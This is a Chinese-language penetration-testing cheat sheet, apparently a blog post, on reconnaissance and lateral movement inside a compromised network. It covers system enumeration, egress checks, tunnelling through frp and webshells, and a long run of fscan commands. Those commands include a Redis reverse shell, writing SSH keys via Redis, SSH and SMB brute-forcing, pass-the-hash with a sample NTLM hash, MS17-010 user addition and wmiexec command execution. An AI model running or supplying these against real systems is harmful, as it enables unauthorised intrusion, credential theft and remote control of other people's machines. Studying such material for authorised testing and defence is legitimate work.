获取网络配置
ipconfig /all
ifconfig
同时通过这个也可以知道是windows还是linux
获取系统信息
systeminfo | findstr /B /C"OS名称 " OS 版本"
systeminfo | findstr /B /C"OSName " OS Version"
其实直接使用systeminfo感觉更靠谱,有些版本格式不一样,查不出来。不如直接使用systeminfo。
使用工具
http://www.fuzzysecurity.com/scripts/files/wmic_info.rar
识别杀软网站
https://i.hacking8.com/tiquan/
查看是否出网
ICMP协议
ping www.baidu.com
tracert baidu.com
TCP/UDP
telnet 192.168.1.108 22 //TCP
nc -zv 39.101.135.232 9999 //TCP
nc -zuv 192.168.1.108 80 //UDP
HTTP/HTTPS
curl http://www.baidu.com //HTTP
curl https://www.baidu.com //HTTPS
Linux:wget、curl
Windows:certutil、powershell、bitsadmin、regsrv......
DNS
dig @8.8.8.8 www.baidu.com //DNS
nslookup www.baidu.com 8.8.8.8 //DNS
获取权限信息
whoami
隧道搭建
当frp搭建不了的时候,使用webshell来进行一个搭流量转发
https://github.com/zema1/suo5
https://github.com/fatedier/frp/releases/tag/v0.58.1
https://github.com/ehang-io/nps/blob/master/README_zh.md
内网扫描
查询arp缓存表
arp -n
arp -a
使用扫描工具
https://github.com/shmilylty/netspy
nohup netspy is &
nohup netspy is -c 10.0.0.1/8 &
https://github.com/shadow1ng/fscan
fscan.exe -h 192.168.1.1/24 -nobr -nopoc
fscan.exe -h 192.168.1.1/24 -np -no -nopoc(跳过存活检测 、不保存文件、跳过web poc扫描)
fscan.exe -h 192.168.1.1/24 -rf id_rsa.pub (redis 写公钥)
fscan.exe -h 192.168.1.1/24 -rs 192.168.1.1:6666 (redis 计划任务反弹shell)
fscan.exe -h 192.168.1.1/24 -c whoami (ssh 爆破成功后,命令执行)
fscan.exe -h 192.168.1.1/24 -m ssh -p 2222 (指定模块ssh和端口)
fscan.exe -h 192.168.1.1/24 -pwdf pwd.txt -userf users.txt (加载指定文件的用户名、密码来进行爆破)
fscan.exe -h 192.168.1.1/24 -o /tmp/1.txt (指定扫描结果保存路径,默认保存在当前路径)
fscan.exe -h 192.168.1.1/8 (A段的192.x.x.1和192.x.x.254,方便快速查看网段信息 )
fscan.exe -h 192.168.1.1/24 -m smb -pwd password (smb密码碰撞)
fscan.exe -h 192.168.1.1/24 -m ms17010 (指定模块)
fscan.exe -hf ip.txt (以文件导入)
fscan.exe -u http://baidu.com -proxy 8080 (扫描单个url,并设置http代理 http://127.0.0.1:8080)
fscan.exe -h 192.168.1.1/24 -nobr -nopoc (不进行爆破,不扫Web poc,以减少流量)
fscan.exe -h 192.168.1.1/24 -pa 3389 (在原基础上,加入3389->rdp扫描)
fscan.exe -h 192.168.1.1/24 -socks5 127.0.0.1:1080 (只支持简单tcp功能的代理,部分功能的库不支持设置代理)
fscan.exe -h 192.168.1.1/24 -m ms17010 -sc add (内置添加用户等功能,只适用于备选工具,更推荐其他ms17010的专项利用工具)
fscan.exe -h 192.168.1.1/24 -m smb2 -user admin -hash xxxxx (pth hash碰撞,xxxx:ntlmhash,如32ed87bdb5fdc5e9cba88547376818d4)
fscan.exe -h 192.168.1.1/24 -m wmiexec -user admin -pwd password -c xxxxx (wmiexec无回显命令执行)
-socks5
域信息获取
参考[[Cobalt Strike使用]]
标签:24,exe,1.1,渗透,192.168,fscan,工具,com From: https://www.cnblogs.com/Ho1dF0rward/p/18240764